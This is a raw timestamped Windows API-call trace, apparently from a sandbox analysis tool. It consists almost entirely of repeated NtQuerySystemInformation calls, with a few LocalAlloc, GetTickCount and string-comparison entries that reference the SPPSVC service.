NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.696] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x28, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x28, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x28, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdda0, Length=0x48, ResultLength=0x0) [0189.699] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x28, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd00, Length=0x28, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x27fc98c6720 [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf80, Length=0x40, ResultLength=0x0) [0189.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x58, ResultLength=0x0) [0189.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde40, Length=0x28, ResultLength=0x0) [0189.804] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0189.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x58, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x58, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x58, ResultLength=0x0) [0189.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbf0, Length=0x28, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc60, Length=0x28, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdce0, Length=0x28, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdce0, Length=0x28, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0189.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb50, Length=0x20, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x20, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x20, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdad0, Length=0x20, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd20, Length=0x20, ResultLength=0x0) [0190.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x20, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x20, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x20, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddb0, Length=0x38, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc40, Length=0x20, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x20, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x20, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x58, ResultLength=0x0) [0190.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde10, Length=0x20, ResultLength=0x0) [0190.050] GetTickCount () returned 0x1170264 [0190.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcc8, Length=0x58, ResultLength=0x0) [0190.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0190.050] 